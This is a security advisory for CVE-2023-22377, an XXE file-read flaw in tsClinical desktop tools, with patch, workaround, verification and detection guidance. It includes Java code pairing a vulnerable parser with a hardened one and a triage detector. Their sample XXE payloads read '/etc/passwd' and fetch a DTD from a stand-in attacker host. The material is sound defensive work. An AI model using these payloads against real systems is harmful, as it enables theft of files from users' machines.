CVE-2023-22377

7.4 HIGH
XXE

📋 TL;DR

This XML External Entity (XXE) injection vulnerability in tsClinical software lets an attacker read arbitrary files readable by the user running the tool: the XML parser resolves external entities declared in a crafted XML file and inlines their contents into the parsed document. It affects tsClinical Define.xml Generator versions 1.0.0 through 1.4.0 and tsClinical Metadata Desktop Tools versions 1.0.3 through 1.1.0 whenever they process XML from an untrusted source.

💻 Affected Systems

Products:
  • tsClinical Define.xml Generator
  • tsClinical Metadata Desktop Tools
Versions: Define.xml Generator: v1.0.0 to v1.4.0; Metadata Desktop Tools: v1.0.3 to v1.1.0
Operating Systems: All platforms running affected software
Default Config Vulnerable: ⚠️ Yes
Notes: The issue is reachable through ordinary XML file processing; the parser configuration that resolves external entities is the shipped default, so no non-default setting is needed to be exposed.

📦 What is this software?

Desktop tools for CDISC study metadata used in clinical-trial submissions: Define.xml Generator produces Define-XML documents from study metadata, and Metadata Desktop Tools is published in the open-source tsc-desktop repository referenced by the vendor advisory. Both read XML files supplied by the user, which is where the vulnerable parsing happens.

⚠️ Risk & Real-World Impact

🔴

Worst Case

Disclosure of any file readable by the account that runs the tool (configuration files, stored credentials, SSH keys), giving the attacker a foothold for lateral movement or data exfiltration from that workstation.

🟠

Likely Case

Unauthorized reading of sensitive files on the user's workstation: application data, credentials, or system information, returned to the attacker inside the tool's output or error messages.

🟢

If Mitigated

Limited impact once the XML parser refuses DOCTYPE declarations and external entities, and untrusted XML is validated before processing.

🌐 Internet-Facing: MEDIUM - These are desktop tools, so the parser is not exposed directly to the network; exploitation needs a crafted XML file to be delivered to and opened by a user of the tool, for example a metadata file received from a partner.
🏢 Internal Only: HIGH - Any internal user or automated workflow that can place XML files in the tool's input path can trigger the read, and the disclosed files are those of the user running the tool.

🎯 Exploit Status

Public PoC: No
Weaponized: UNKNOWN
Unauthenticated Exploit: No (the tool must open a file the attacker supplied)
Complexity: LOW

Exploitation only requires getting a crafted XML file processed by the application; no authentication is involved, but a user or an automated workflow has to open the file.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Define.xml Generator: v1.4.1 or later; Metadata Desktop Tools: v1.1.1 or later

Vendor Advisory: https://github.com/tsClinical/tsc-desktop/security/advisories

Restart Required: Yes

Instructions:

1. Download the latest version from the official source.
2. Back up configuration and data.
3. Uninstall the old version.
4. Install the patched version.
5. Restart the application (and any service that wraps it).

🔧 Temporary Workarounds

Disable XXE in XML parser

Applies to: all platforms (only where you build the tool from source or embed its parsing code; end users cannot change the parser settings inside a packaged release and should update instead)

Configure the XML parser so that it never resolves external entities:

Set XMLConstants.FEATURE_SECURE_PROCESSING to true on the parser factory
Disallow DOCTYPE declarations (feature http://apache.org/xml/features/disallow-doctype-decl = true); as a fallback for parsers without that feature, set external-general-entities and external-parameter-entities to false and ACCESS_EXTERNAL_DTD to an empty string
Do not rely on FEATURE_SECURE_PROCESSING alone: its effect on external entity resolution depends on the JAXP implementation and JDK version, whereas refusing DOCTYPE is unambiguous

Input validation and sanitization

Applies to: all platforms

Reject untrusted XML before it reaches the parser:

Refuse any XML that contains a DOCTYPE declaration; this is a byte-level check on the file, done before parsing, and is safe wherever the input format is defined by an XML Schema rather than a DTD
Schema validation by itself does not prevent XXE: entities are expanded while the document is parsed, before validation sees it, so validate only after the DOCTYPE check
Allow only the expected root element and namespaces (a whitelist of XML elements) and discard anything else
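The hardening the workaround describes, side by side with the default (vulnerable) parser configuration, as an added example; this is not code from tsClinical or the tsc-desktop project. It assumes a JAXP DocumentBuilder (the JDK's built-in parser) on Java 11 or later and constructs its own canary file and payload; the class name, the ODM/Study element names and the canary path are illustrative. The same program doubles as the canary test described under How to Verify: the default builder returns the canary contents, the hardened builder rejects the file.

```java
import java.io.ByteArrayInputStream;
import java.nio.charset.StandardCharsets;
import java.nio.file.Files;
import java.nio.file.Path;
import java.util.regex.Pattern;

import javax.xml.XMLConstants;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.ParserConfigurationException;

import org.w3c.dom.Document;
import org.xml.sax.SAXException;

public class XxeHardening {

    // Vulnerable: a default DocumentBuilderFactory resolves external entities
    // such as <!ENTITY xxe SYSTEM "file:///..."> and inlines the file contents.
    static DocumentBuilder vulnerableBuilder() throws ParserConfigurationException {
        return DocumentBuilderFactory.newInstance().newDocumentBuilder();
    }

    // Hardened: refuse DOCTYPE outright (the unambiguous control), and additionally
    // switch off external entities, external DTD loading and XInclude so the
    // configuration stays safe on a parser that does not honour the DOCTYPE feature.
    static DocumentBuilder hardenedBuilder() throws ParserConfigurationException {
        DocumentBuilderFactory f = DocumentBuilderFactory.newInstance();
        f.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
        f.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        f.setFeature("http://xml.org/sax/features/external-general-entities", false);
        f.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        f.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
        f.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, "");
        f.setAttribute(XMLConstants.ACCESS_EXTERNAL_SCHEMA, "");
        f.setXIncludeAware(false);
        f.setExpandEntityReferences(false);
        return f.newDocumentBuilder();
    }

    // Byte-level pre-parse check for code paths that cannot change parser settings:
    // any DOCTYPE is rejected before the bytes reach an XML parser.
    private static final Pattern DOCTYPE = Pattern.compile("<!DOCTYPE", Pattern.CASE_INSENSITIVE);

    static boolean containsDoctype(String xml) {
        return DOCTYPE.matcher(xml).find();
    }

    public static void main(String[] args) throws Exception {
        // Constructed canary: a file whose contents must never appear in parser output.
        Path secret = Files.createTempFile("xxe-canary", ".txt");
        Files.writeString(secret, "CANARY-SECRET-VALUE");
        try {
            // Constructed payload in the shape of CVE-2023-22377: an external general
            // entity pointing at a local file, referenced from the document body.
            String payload =
                "<?xml version=\"1.0\"?>\n" +
                "<!DOCTYPE ODM [<!ENTITY xxe SYSTEM \"" + secret.toUri() + "\">]>\n" +
                "<ODM><Study>&xxe;</Study></ODM>\n";
            byte[] bytes = payload.getBytes(StandardCharsets.UTF_8);

            System.out.println("pre-parse DOCTYPE check flags payload: " + containsDoctype(payload));

            Document doc = vulnerableBuilder().parse(new ByteArrayInputStream(bytes));
            System.out.println("vulnerable parser output: " + doc.getDocumentElement().getTextContent());

            try {
                hardenedBuilder().parse(new ByteArrayInputStream(bytes));
                System.out.println("hardened parser: UNEXPECTED success");
            } catch (SAXException e) {
                System.out.println("hardened parser rejected input: " + e.getMessage());
            }
        } finally {
            Files.deleteIfExists(secret);
        }
    }
}
```

Run it with `java XxeHardening.java` on JDK 11 or later. The hardened factory fails closed with a SAXParseException instead of silently returning inlined file contents; the pre-parse DOCTYPE check is the control for code paths where the parser cannot be reconfigured.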

🧯 If You Can't Patch

  • Only process XML files from trusted sources; treat files received from outside parties (partners, CROs, email attachments) as untrusted until they have been checked for DOCTYPE declarations
  • Run the tool under a low-privilege account that has no access to credentials, keys or data beyond what the job needs, so that a successful file read discloses as little as possible; keep the workstation segmented from sensitive systems

🔍 How to Verify

Check if Vulnerable:

Compare the installed version with the affected ranges. To confirm the behaviour, open a test XML file that declares an external entity pointing at a harmless local file you created (a canary), reference that entity in the document body, and check whether the canary's contents appear in the tool's output or error messages.

Check Version:

Check the application's About menu or its configuration files for the version information

Verify Fix Applied:

Confirm the version is patched (v1.4.1 or later for Define.xml Generator, v1.1.1 or later for Metadata Desktop Tools), then repeat the canary test: the crafted file should now be rejected with a parse error and the canary contents must not appear anywhere in the output.

📡 Detection & Monitoring

Log Indicators:

  • The tool's process reading files unrelated to its job (password files, SSH keys, application configuration) shortly after an XML file is opened
  • XML parsing errors that mention external entities, DTDs or failed entity resolution
  • Unexpectedly large XML input files (entity expansion, or embedding of large disclosed files)

Network Indicators:

  • XML files arriving from external parties that contain DOCTYPE declarations
  • Outbound HTTP or FTP connections from the tool's host while an XML file is being processed (out-of-band entity resolution)

SIEM Query:

source="application_logs" AND ("<!DOCTYPE" OR "<!ENTITY" OR "SYSTEM \"file:") AND NOT "expected_xml_pattern"

Replace expected_xml_pattern with a marker from your known-good inputs. The query only fires if the application logs XML content or parse errors that echo the DOCTYPE; for desktop installations, file-level auditing (which user opened which XML file, and which files the process read afterwards) is usually the more reliable source.
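A pre-ingestion triage check that implements the DOCTYPE/ENTITY indicators above against the file contents themselves, as an added example (not tsClinical or tsc-desktop code); the three sample documents are constructed here and their element names are illustrative. It uses plain regular expressions over the raw text, so it never instantiates an XML parser and cannot itself trigger entity resolution.

```java
import java.util.ArrayList;
import java.util.List;
import java.util.regex.Matcher;
import java.util.regex.Pattern;

public class XxeTriage {

    // The whole DOCTYPE declaration, including an internal subset in [...].
    private static final Pattern DOCTYPE =
        Pattern.compile("<!DOCTYPE[^\\[>]*(?:\\[[\\s\\S]*?\\])?\\s*>", Pattern.CASE_INSENSITIVE);
    // DOCTYPE that pulls in an external DTD (no entity declarations needed in the file).
    private static final Pattern EXTERNAL_DTD =
        Pattern.compile("<!DOCTYPE\\s+\\S+\\s+(?:SYSTEM|PUBLIC)\\b", Pattern.CASE_INSENSITIVE);
    // Entity declarations with an external identifier; group 1 marks parameter entities.
    private static final Pattern EXTERNAL_ENTITY =
        Pattern.compile("<!ENTITY\\s+(%\\s*)?(\\S+)\\s+(SYSTEM|PUBLIC)\\b", Pattern.CASE_INSENSITIVE);
    // URI schemes inside the DOCTYPE that point at local files or remote hosts.
    private static final Pattern LOCAL_URI = Pattern.compile("\\bfile:", Pattern.CASE_INSENSITIVE);
    private static final Pattern REMOTE_URI = Pattern.compile("\\b(?:https?|ftp)://", Pattern.CASE_INSENSITIVE);

    // Returns one human-readable finding per indicator; empty means nothing to resolve externally.
    static List<String> findings(String xml) {
        List<String> out = new ArrayList<>();
        Matcher dt = DOCTYPE.matcher(xml);
        if (!dt.find()) {
            return out; // no DOCTYPE: the parser has nothing external to resolve
        }
        String decl = dt.group();
        out.add("DOCTYPE declaration present");
        if (EXTERNAL_DTD.matcher(decl).find()) {
            out.add("external DTD referenced from DOCTYPE");
        }
        Matcher ent = EXTERNAL_ENTITY.matcher(decl);
        while (ent.find()) {
            String kind = ent.group(1) == null ? "general" : "parameter";
            out.add("external " + kind + " entity '" + ent.group(2) + "' (" + ent.group(3).toUpperCase() + ")");
        }
        if (LOCAL_URI.matcher(decl).find()) {
            out.add("file: URI in DOCTYPE (local file read)");
        }
        if (REMOTE_URI.matcher(decl).find()) {
            out.add("remote URI in DOCTYPE (out-of-band resolution)");
        }
        return out;
    }

    static boolean suspicious(String xml) {
        return !findings(xml).isEmpty();
    }

    public static void main(String[] args) {
        // Constructed samples: a benign schema-based document, a local file read in the
        // shape of CVE-2023-22377, and an out-of-band variant using a parameter entity.
        String[][] samples = {
            {"benign Define-XML style document",
             "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n" +
             "<?xml-stylesheet type=\"text/xsl\" href=\"define2-0-0.xsl\"?>\n" +
             "<ODM xmlns=\"http://www.cdisc.org/ns/odm/v1.3\"><Study OID=\"S1\"/></ODM>"},
            {"local file read",
             "<?xml version=\"1.0\"?>\n" +
             "<!DOCTYPE ODM [<!ENTITY xxe SYSTEM \"file:///etc/passwd\">]>\n" +
             "<ODM><Study>&xxe;</Study></ODM>"},
            {"out-of-band parameter entity",
             "<?xml version=\"1.0\"?>\n" +
             "<!DOCTYPE ODM [<!ENTITY % dtd SYSTEM \"http://attacker.example/evil.dtd\"> %dtd;]>\n" +
             "<ODM/>"},
        };
        for (String[] s : samples) {
            System.out.println(s[0] + " -> suspicious=" + suspicious(s[1]));
            for (String f : findings(s[1])) {
                System.out.println("    " + f);
            }
        }
    }
}
```

Because the check works on the raw bytes, it belongs at the point where files enter the workflow (a shared drop folder, an email gateway, or a wrapper script that calls the tool), and it flags the benign sample as clean even though its namespace contains an http:// URL, since only the DOCTYPE region is inspected for URIs.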

🔗 References

  • Vendor advisory: https://github.com/tsClinical/tsc-desktop/security/advisories
  • NVD entry: https://nvd.nist.gov/vuln/detail/CVE-2023-22377